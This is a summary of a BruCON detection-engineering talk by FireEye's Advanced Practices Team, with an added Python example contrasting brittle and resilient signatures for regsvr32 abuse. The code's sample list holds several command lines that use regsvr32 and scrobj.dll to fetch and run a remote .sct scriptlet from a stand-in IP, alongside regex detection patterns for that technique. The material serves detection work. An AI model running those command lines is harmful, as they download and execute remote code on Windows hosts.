Explore the intricacies of creating resilient, high-fidelity threat detections in this 57-minute conference talk from BruCON Security Conference. Delve into the challenge of writing signatures that survive evasion attempts by determined attackers and researchers. Learn from FireEye's Advanced Practices Team as they share their processes and approaches to detection development, including practical examples derived from real-world attacks. Discover why the right tools, adequate visibility, and a methodical, iterative workflow are what make detections effective. Gain practical knowledge of each stage of that workflow: defining the signature, choosing a detection methodology, assembling a sample set, testing existing protections, generating data, writing the rule, and gathering intelligence. Examine specific examples such as regsvr32 detection, FTP over WebDAV, argument reordering, and HTTPS SCT detection. Understand the attack lifecycle and the importance of knowing your tools and recognising new applications of existing techniques in the ever-evolving landscape of cybersecurity.
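The argument-reordering and regsvr32 examples mentioned above are a good place to see what "resilient" means in practice. The following is an added illustration, not code from the talk or from FireEye: a brittle signature that keys on one exact command line is placed beside a detection that keys on the behaviour (regsvr32 loading scrobj.dll with a remote /i: script) regardless of argument order, switch prefix, case, or image path. The sample command lines, the IP address and the function names are constructed for this example.

```python
"""Brittle vs resilient detection for regsvr32 scriptlet abuse.

Added example, not from the original talk. The sample command lines
below are constructed; the logic illustrates the "argument reordering"
evasion the talk lists and is not FireEye's own rule.
"""
import re

# Brittle signature: one exact argument order, one switch prefix.
# Swapping two switches, using '-' instead of '/', or dropping the
# optional /s and /u switches is enough to evade it.
BRITTLE = re.compile(r"regsvr32\.exe /s /u /i:http\S+ scrobj\.dll", re.IGNORECASE)

# Remote script source: /i: or -i: followed by a URL or a UNC path.
REMOTE_SCRIPT = re.compile(r"^[/-]i:(https?://|\\\\)")


def brittle_match(cmdline: str) -> bool:
    """Exact-pattern signature: cheap, but order- and case-dependent."""
    return bool(BRITTLE.search(cmdline))


def tokenize(cmdline: str) -> list:
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return re.findall(r'"[^"]*"|\S+', cmdline)


def resilient_match(cmdline: str) -> bool:
    """Match the behaviour, not the string.

    All three must hold, in any token order:
      - the image is regsvr32 (any directory, any case, quoted or not)
      - an /i: or -i: argument points at a URL or a remote share
      - scrobj.dll is the module being registered
    /s and /u are deliberately not required: the attack works without them.
    """
    tokens = tokenize(cmdline)
    if not tokens:
        return False
    image = tokens[0].strip('"').rsplit("\\", 1)[-1].lower()
    if image not in ("regsvr32.exe", "regsvr32"):
        return False
    has_remote_script = False
    has_scrobj = False
    for tok in tokens[1:]:
        t = tok.strip('"').lower()
        if REMOTE_SCRIPT.match(t):
            has_remote_script = True
        if t.endswith("scrobj.dll"):
            has_scrobj = True
    return has_remote_script and has_scrobj


# Constructed sample command lines (not real telemetry).
SAMPLES = [
    # classic ordering: both signatures fire
    r"regsvr32.exe /s /u /i:http://203.0.113.5/a.sct scrobj.dll",
    # reordered switches, dash prefix, full path: brittle misses
    r"C:\Windows\System32\regsvr32.exe -i:http://203.0.113.5/a.sct -u -s scrobj.dll",
    # /s and /u dropped, mixed case, quoted image path: brittle misses
    r'"C:\Windows\SysWOW64\REGSVR32.EXE" /I:HTTPS://203.0.113.5/b.sct ScrObj.dll',
    # benign registration of a local COM server: neither fires
    r"regsvr32.exe /s C:\Program Files\App\app.dll",
    # remote script but not scrobj.dll: outside the scope of this rule
    r"regsvr32.exe /i:http://203.0.113.5/c.sct other.dll",
]


def evaluate(samples=SAMPLES) -> list:
    """Return (brittle, resilient) verdicts for each sample, in order."""
    return [(brittle_match(s), resilient_match(s)) for s in samples]


if __name__ == "__main__":
    for sample, (b, r) in zip(SAMPLES, evaluate()):
        print(f"brittle={b!s:5} resilient={r!s:5}  {sample}")
```

The resilient rule still has a scope boundary, shown by the last sample: a remote /i: script with a module other than scrobj.dll is a separate hypothesis that deserves its own rule and its own sample set, rather than a loosening of this one. That is the iterative loop the talk describes: decide what the signature is meant to catch, assemble samples that include the evasions you expect, and test both the hit rate and the false-positive rate before shipping.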
Signatures Are Dead - Long Live Resilient Signatures